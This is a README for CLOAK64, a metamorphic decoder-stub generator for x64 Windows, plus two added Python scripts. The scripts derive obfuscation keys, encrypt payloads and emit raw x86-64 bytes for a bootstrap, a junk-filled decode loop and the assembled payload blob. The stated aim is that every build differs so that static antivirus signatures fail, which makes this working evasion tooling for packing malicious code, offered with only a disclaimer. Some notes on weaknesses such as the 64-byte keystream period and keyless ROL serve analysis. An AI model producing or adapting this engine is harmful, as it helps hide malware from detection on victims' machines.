Warning
Use responsibly.
This project is licensed under the MIT License.
The author takes no liability for misuse, damage, or unintended consequences.
Note
Inspired by https://github.com/0xf00sec/Vx
┌──────────────────────────────────────────────────────────────────────────┐
│ CLOAK64 │
│ metamorphic decoder-stub generator │
└──────────────────────────────────────────────────────────────────────────┘
>> what is it?
CLOAK64 is a metamorphic code engine for x86_64 Windows that generates
unique decoder stubs. Each generation produces a stub that is functionally
identical to the last but differs byte-for-byte (register choice,
instruction form, junk and jump encoding).
[+] target: Windows 11 24H2 (build 26100), x64
────────────────────────────────────[ 0x01 ]─────────────────────────────────
>> what's in the box?
[+] PolymorphicEngine > decoder generator with metamorphic integration
[+] MetamorphicEngine > instruction variants (XOR/ADD/SUB/ROL)
[+] Bootstrap > 15–16 byte position-independent loader
[+] GenerateFibonacciKeys > entropy-seeded fibonacci key derivation
[+] Configure > register and algorithm selection
[+] MetamorphicPointer > INC vs ADD pointer advancement variants
[+] GenerateTrash > multi-pattern junk instruction injection
[+] EmitJnzBackToSaved > adaptable short/long jump emission
[+] ApplyEncryption > inverse algorithm payload encryption
[+] ResetGlobalState > state initialization with RDTSC entropy
────────────────────────────────────[ 0x02 ]────────────────────────────────
>> what does it do?
0x01: Derives keys from RDTSC + Fibonacci with entropy mixing (these are obfuscation keys, not cryptographic ones: the decoder carries the key as an immediate, so they only need to differ per build)
0x02: Configures metamorphic parameters (registers, algorithms, profiles)
0x03: Encrypts payload using inverse of selected decryption algorithm
0x04: Generates bootstrap loader (CALL/POP/LEA|ADD/JMP sequence)
0x05: Creates decoder loop with variable features
0x06: Applies metamorphic variants to algorithms
0x07: Outputs the final blob ([Bootstrap][Key][Decoder][Encrypted payload]) whose bytes differ on every run, so no fixed static signature survives across builds
────────────────────────────────────[ 0x03 ]────────────────────────────────
>> features
[+] Algorithms: XOR / ADD / SUB / ROL
0x01 sizes: XOR 2/6/10 | ADD 2/6/10 | SUB 2/6/10 | ROL 2/6
0x02 forms: Direct(2) OP [RDI], BL
Load-Op-Store(6) MOV AL,[RDI] / OP AL,BL / MOV [RDI],AL
Extended(10) LODSB / OP / STOSB
(LODSB reads [RSI] and STOSB writes [RDI]; both advance their pointer register by
themselves, so the Extended form has to keep RSI in step with RDI and the
pointer-advance step must not add a second increment)
0x03 note: for ROL Direct use ROL byte [RDI], 1 (a fixed 1-bit rotate; the key
register is not involved, so the ROL algorithm is keyless)
[+] Encrypt/decode pairs (encryption op -> decoder op): XOR -> XOR; ADD -> SUB; SUB -> ADD; ROR -> ROL
[+] Metamorphism: same semantics, different instruction sequences
[+] Register selection: RegBase / RegCount / RegKey (auto-resolve)
[+] Keys: RDTSC + Fibonacci + transforms; the decoder rolls the 64-bit key one bit per byte, so the byte keystream repeats at least every 64 bytes
[+] Addressing: CALL/POP (RIP-relative), full PIC
[+] Jumps: adaptive short/long selection
[+] Pointer advance: INC RDI | ADD RDI,1
[+] Junk injection: NOPs, reg ops, PUSH/POP (multi-pattern)
[+] Bootstrap: 15 or 16 bytes, length validated after emission
[+] Layout: 64-byte key section; three-layer architecture
[+] Entropy output: every build differs byte-for-byte, so a static signature taken from one sample does not match the next; the structure (CALL/POP GetPC, byte-wise decode loop, plaintext payload in memory before the RET) is the same in every build, so this defeats static signatures only, not heuristic or behavioural detection
[+] Dependencies: bootstrap has no API calls
[+] Errors: LastErrorCode tracking
[+] Size limits: decoder <= 8 KB; payload <= 64 KB; scratch <= 16 KB
────────────────────────────────────[ 0x04 ]────────────────────────────────
>> execution flow:
BUILD-TIME GENERATION
┌──────────────────────────────────────────────────────────────────────────┐
│ 0x01 Generate Keys │
├──────────────────────────────────────────────────────────────────────────┤
│ 0x01: RDTSC entropy + Fibonacci math │
│ 0x02: Makes UserKey / PrimaryKey / SecondaryKey │
│ 0x03: Seeds PRNG for subsequent operations │
└──────────────────────────────────────────────────────────────────────────┘
│
v
┌──────────────────────────────────────────────────────────────────────────┐
│ 0x02 Configure Engine │
├──────────────────────────────────────────────────────────────────────────┤
│ 0x01: Select RegBase (RBX/RDX/RSI/RDI) │
│ 0x02: Select RegCount (avoids RegBase) │
│ 0x03: Select RegKey (avoids both) │
│ 0x04: Select Algorithm index (0-3) │
│ 0x05: Select Metamorphic profile (0-7) │
└──────────────────────────────────────────────────────────────────────────┘
│
v
┌──────────────────────────────────────────────────────────────────────────┐
│ 0x03 ApplyEncryption │
├──────────────────────────────────────────────────────────────────────────┤
│ 0x01: XOR: encrypt with XOR (rolling key), decode with XOR │
│ 0x02: ADD: encrypt with ADD (rolling key), decode with SUB │
│ 0x03: SUB: encrypt with SUB (rolling key), decode with ADD │
│ 0x04: ROR: encrypt with ROR 1 bit per byte, decode with ROL │
└──────────────────────────────────────────────────────────────────────────┘
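The key derivation (0x01) and the encrypt/decode pairing (0x03) as an added, runnable example; this is not CLOAK64's own code. derive_keys is an illustrative RDTSC+Fibonacci stand-in (time.perf_counter_ns() in place of RDTSC, mixing constant assumed, since the page does not document the real mixing steps). apply_encryption takes the selected decoder op and applies its inverse, rolling the 64-bit key one bit per byte exactly as the decoder's ROL RBX, 1 does, and reference_decode mirrors the decode loop in Python. keystream_period and recover_xor_payload go beyond the page to show the consequence of that rolling scheme: the per-byte keystream repeats every 64 bytes at most, so 64 consecutive known plaintext bytes recover the whole payload without the key.

```python
import time

MASK64 = (1 << 64) - 1
ALGOS = ("XOR", "ADD", "SUB", "ROL")   # the op the *decoder* executes on each byte


def rol64(x, n):
    n %= 64
    return ((x << n) | (x >> (64 - n))) & MASK64


def derive_keys(entropy=None):
    """Illustrative stand-in for GenerateFibonacciKeys (not CLOAK64's code).
    Seeds a Fibonacci-style recurrence from a timestamp counter and mixes the terms.
    time.perf_counter_ns() replaces RDTSC; the constant and mixing are assumptions."""
    seed = (time.perf_counter_ns() if entropy is None else entropy) & MASK64
    a, b = seed, rol64(seed, 29) ^ 0x9E3779B97F4A7C15
    terms = []
    for _ in range(32):
        a, b = b, (a + b) & MASK64          # Fibonacci step mod 2^64
        terms.append(b ^ rol64(a, 17))      # cheap mixing transform
    return terms[-3], terms[-2], terms[-1]  # UserKey, PrimaryKey, SecondaryKey


def keystream(key, n):
    """Key byte the decoder sees at iteration i: BL after i executions of ROL RBX, 1."""
    k = key
    for _ in range(n):
        yield k & 0xFF
        k = rol64(k, 1)


def apply_encryption(payload, key, algo):
    """Encrypt with the inverse of the decoder op: XOR<->XOR, ADD<-SUB, SUB<-ADD, ROL<-ROR."""
    out = bytearray()
    for p, kb in zip(payload, keystream(key, len(payload))):
        if algo == "XOR":
            out.append(p ^ kb)
        elif algo == "ADD":                         # decoder does ADD [RDI], BL
            out.append((p - kb) & 0xFF)
        elif algo == "SUB":                         # decoder does SUB [RDI], BL
            out.append((p + kb) & 0xFF)
        elif algo == "ROL":                         # decoder does ROL byte [RDI], 1 (keyless)
            out.append(((p >> 1) | (p << 7)) & 0xFF)
        else:
            raise ValueError(algo)
    return bytes(out)


def reference_decode(blob, key, algo):
    """Python mirror of the loop: OP [RDI],BL ; ROL RBX,1 ; INC RDI ; DEC RCX ; JNZ."""
    out = bytearray()
    for c, kb in zip(blob, keystream(key, len(blob))):
        if algo == "XOR":
            out.append(c ^ kb)
        elif algo == "ADD":
            out.append((c + kb) & 0xFF)
        elif algo == "SUB":
            out.append((c - kb) & 0xFF)
        elif algo == "ROL":
            out.append(((c << 1) | (c >> 7)) & 0xFF)
        else:
            raise ValueError(algo)
    return bytes(out)


def keystream_period(key):
    """ROL by 1 on a 64-bit register is back at the start after 64 steps, so the
    per-byte key sequence repeats with a period that divides 64."""
    seq = list(keystream(key, 128))
    for p in range(1, 65):
        if seq[:128 - p] == seq[p:]:
            return p
    return 64


def recover_xor_payload(cipher, known_plaintext, offset=0):
    """Known-plaintext caveat for the XOR decoder: 64 consecutive known bytes at any
    offset (a stub prologue, a PE header) yield the whole repeating mask."""
    assert len(known_plaintext) >= 64
    mask = [0] * 64
    for i in range(64):
        mask[(offset + i) % 64] = cipher[offset + i] ^ known_plaintext[i]
    return bytes(cipher[i] ^ mask[i % 64] for i in range(len(cipher)))


if __name__ == "__main__":
    sample = bytes(range(256)) * 2                  # constructed 512-byte payload
    _, primary, _ = derive_keys()
    for algo in ALGOS:
        assert reference_decode(apply_encryption(sample, primary, algo), primary, algo) == sample
    print("round-trip ok; keystream period =", keystream_period(primary))
```

The ROL path is the weakest of the four: it uses no key at all, so any reader who sees ROL byte [RDI], 1 in the loop can recover the payload with a one-line rotate.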
│
v
┌──────────────────────────────────────────────────────────────────────────┐
│ 0x04 Generate Bootstrap │
├──────────────────────────────────────────────────────────────────────────┤
│ 0x01: CALL next / POP RAX (RIP discovery) │
│ 0x02: Choose LEA or ADD form (randomized) │
│ 0x03: Set RDI pointer │
│ 0x04: JMP RAX -> decoder │
│ 0x05: Length validated: 15 or 16 bytes, depending on the form chosen │
└──────────────────────────────────────────────────────────────────────────┘
│
v
┌──────────────────────────────────────────────────────────────────────────┐
│ 0x05 PolymorphicEngine │
├──────────────────────────────────────────────────────────────────────────┤
│ 0x01: Initialize key (MOV r64, imm64) │
│ 0x02: RIP calc via CALL/POP │
│ 0x03: LEA decoder address │
│ 0x04: MOV payload size -> counter │
│ 0x05: Metamorphic decode loop │
│ 0x06: Trash code injection │
│ 0x07: Pointer increment: INC RDI or ADD RDI, 1 │
│ 0x08: DEC/JNZ loop; RET -> decrypted payload │
└──────────────────────────────────────────────────────────────────────────┘
│
v
┌──────────────────────────────────────────────────────────────────────────┐
│ 0x06 Assemble Final Layout │
├──────────────────────────────────────────────────────────────────────────┤
│ 0x01: Layout = [Bootstrap 15-16B][Key 64B][Decoder var][Encrypted Payload] │
│ 0x02: Patch displacements (jumps / LEA) │
│ 0x03: Validate total size │
│ 0x04: Return engine size (or 0 on error) │
└──────────────────────────────────────────────────────────────────────────┘
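Steps 0x04 to 0x06 as an added emitter; this is example code, not CLOAK64's. It produces the CALL/POP/LEA|ADD/MOV RDI,RAX/JMP RAX bootstrap, a decoder in the Direct or Load-Op-Store form with junk, INC RDI | ADD RDI,1 and the adaptive short/long JNZ, and assembles [Bootstrap][Key 64B][Decoder][Encrypted payload], patching the LEA displacement only after the junk-inflated decoder length is known and enforcing the page's 8 KB / 64 KB limits. The fixed register roles (RBX key, RDI pointer, RCX counter, AL scratch), the PUSH RDI that gives the closing RET its target, the random filler in the key section and the junk patterns are this example's assumptions; the page does not document CLOAK64's choices for them. Input is an already-encrypted payload (a constructed sample); the output can be inspected with ndisasm -b 64.

```python
import random
import struct

# x86-64 encodings for one fixed register assignment (RBX = key, RDI = pointer,
# RCX = counter, AL = scratch). CLOAK64 picks registers per build; this example does not.
OP_DIRECT = {"XOR": b"\x30\x1f", "ADD": b"\x00\x1f",          # OP [RDI], BL
             "SUB": b"\x28\x1f", "ROL": b"\xd0\x07"}          # ROL byte [RDI], 1
OP_AL_BL = {"XOR": b"\x30\xd8", "ADD": b"\x00\xd8",           # OP AL, BL
            "SUB": b"\x28\xd8", "ROL": b"\xd0\xc0"}           # ROL AL, 1
LOAD_AL, STORE_AL = b"\x8a\x07", b"\x88\x07"                  # MOV AL,[RDI] / MOV [RDI],AL
ROL_RBX_1, DEC_RCX, RET = b"\x48\xd1\xc3", b"\x48\xff\xc9", b"\xc3"
PTR_ADVANCE = [b"\x48\xff\xc7", b"\x48\x83\xc7\x01"]          # INC RDI / ADD RDI, 1
# Junk must preserve RBX/RCX/RDI and leave the stack balanced; flags are free
# because DEC RCX sets them again before the JNZ. Patterns are this example's.
JUNK = [b"\x90", b"\x50\x58", b"\x53\x5b", b"\x48\x89\xc0", b"\x48\x8d\x3f"]
KEY_SECTION = 64
DECODER_MAX, PAYLOAD_MAX = 8 * 1024, 64 * 1024


def emit_jnz_back(here, target):
    """Adaptive JNZ: rel is measured from the end of the jump, whose length is
    2 (rel8) or 6 (rel32), so the candidate offsets differ by the jump's own size."""
    rel8 = target - (here + 2)
    if -128 <= rel8 <= 127:
        return b"\x75" + struct.pack("<b", rel8)
    return b"\x0f\x85" + struct.pack("<i", target - (here + 6))


def emit_bootstrap(use_lea):
    """CALL $+5 / POP RAX leaves RAX = blob+5 (address of the POP). Adjust to the
    decoder, copy to RDI as the page's bootstrap does, JMP RAX. 15 bytes either way."""
    disp = (15 + KEY_SECTION) - 5                  # decoder follows the 64-byte key section
    adjust = (b"\x48\x8d\x40" if use_lea else b"\x48\x83\xc0") + struct.pack("<b", disp)
    return b"\xe8\x00\x00\x00\x00" b"\x58" + adjust + b"\x48\x89\xc7" b"\xff\xe0"


def emit_decoder(enc_len, key, algo, form, rng, junk_count):
    """MOV RBX,key ; CALL/POP ; LEA RDI,[RAX+disp] ; PUSH RDI ; MOV ECX,len ;
    loop: OP ; ROL RBX,1 ; junk ; INC RDI|ADD RDI,1 ; DEC RCX ; JNZ loop ; RET.
    PUSH RDI before the loop is this example's way of making the final RET land on
    the payload; the page does not say how CLOAK64 arranges that."""
    op = OP_DIRECT[algo] if form == "direct" else LOAD_AL + OP_AL_BL[algo] + STORE_AL
    head = b"\x48\xbb" + struct.pack("<Q", key)    # MOV RBX, imm64 (10 bytes)
    head += b"\xe8\x00\x00\x00\x00" b"\x58"         # CALL $+5 ; POP RAX -> RAX = decoder+15
    lea_at = len(head)
    head += b"\x48\x8d\xb8" b"\0\0\0\0"             # LEA RDI,[RAX+disp32], patched below
    head += b"\x57" + b"\xb9" + struct.pack("<I", enc_len)   # PUSH RDI ; MOV ECX, imm32
    loop_off = len(head)
    junk = b"".join(rng.choice(JUNK) for _ in range(junk_count))
    body = op + ROL_RBX_1 + junk + rng.choice(PTR_ADVANCE) + DEC_RCX
    jnz_off = loop_off + len(body)
    code = head + body + emit_jnz_back(jnz_off, loop_off) + RET
    disp = len(code) - 15                           # payload starts right after the decoder
    code = code[:lea_at + 3] + struct.pack("<i", disp) + code[lea_at + 7:]
    return code, {"loop_off": loop_off, "jnz_off": jnz_off, "lea_disp": disp}


def build(enc_payload, key, algo, form, seed, junk_count=8):
    """Assemble [Bootstrap][Key 64B][Decoder][Encrypted payload] under the page's size limits."""
    if len(enc_payload) > PAYLOAD_MAX:
        raise ValueError("payload exceeds 64 KB")
    rng = random.Random(seed)
    boot = emit_bootstrap(use_lea=rng.random() < 0.5)
    assert len(boot) == 15
    key_section = rng.randbytes(KEY_SECTION)       # contents not specified on the page; filler
    dec, info = emit_decoder(len(enc_payload), key, algo, form, rng, junk_count)
    if len(dec) > DECODER_MAX:
        raise ValueError("decoder exceeds 8 KB")
    info.update(bootstrap_len=len(boot), decoder_off=len(boot) + KEY_SECTION,
                payload_off=len(boot) + KEY_SECTION + len(dec))
    return boot + key_section + dec + enc_payload, info


if __name__ == "__main__":
    sample = bytes((i * 37 + 11) & 0xFF for i in range(300))   # constructed "encrypted" input
    blob, info = build(sample, 0x0123456789ABCDEF, "XOR", "direct", seed=1)
    print(len(blob), info)                          # inspect with: ndisasm -b 64 <file>
```

Two builds with different seeds differ in bootstrap form, junk, pointer-advance encoding and key filler while keeping the same loop semantics, which is the metamorphism the page describes; the loop head, JNZ and LEA offsets returned in info are what a validator (or a unit test) should check before the blob is ever executed.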
RUNTIME EXECUTION FLOW
┌──────────────────────────────────────────────────────────────────────────┐
│ 0x01 Bootstrap (15-16 bytes) │
├──────────────────────────────────────────────────────────────────────────┤
│ 0x01: CALL/POP RIP │
│ 0x02: LEA or ADD adjust │
│ 0x03: MOV RDI, RAX (setup pointer) │
│ 0x04: JMP RAX (enter decoder) │
└──────────────────────────────────────────────────────────────────────────┘
│
v
┌──────────────────────────────────────────────────────────────────────────┐
│ 0x02 Decoder │
├──────────────────────────────────────────────────────────────────────────┤
│ 0x01: MOV RBX, transformed_key │
│ 0x02: CALL/POP; LEA base; MOV RDI, base │
│ 0x03: MOV RCX, payload_size │
│ 0x04: Loop step 0x01: decode op (variant) │
│ 0x05: Loop step 0x02: ROL RBX, 1 (key evolve) │
│ 0x06: Loop step 0x03: insert junk │
│ 0x07: Loop step 0x04: pointer INC RDI or ADD RDI, 1 │
│ 0x08: Loop step 0x05: DEC RCX; JNZ loop_start │
│ 0x09: RET -> payload │
└──────────────────────────────────────────────────────────────────────────┘
│
v
┌──────────────────────────────────────────────────────────────────────────┐
│ 0x03 Decrypted Payload │
├──────────────────────────────────────────────────────────────────────────┤
│ 0x01: Restored in memory │
│ 0x02: Obfuscation removed │
│ 0x03: Original code executes │
└──────────────────────────────────────────────────────────────────────────┘
EOF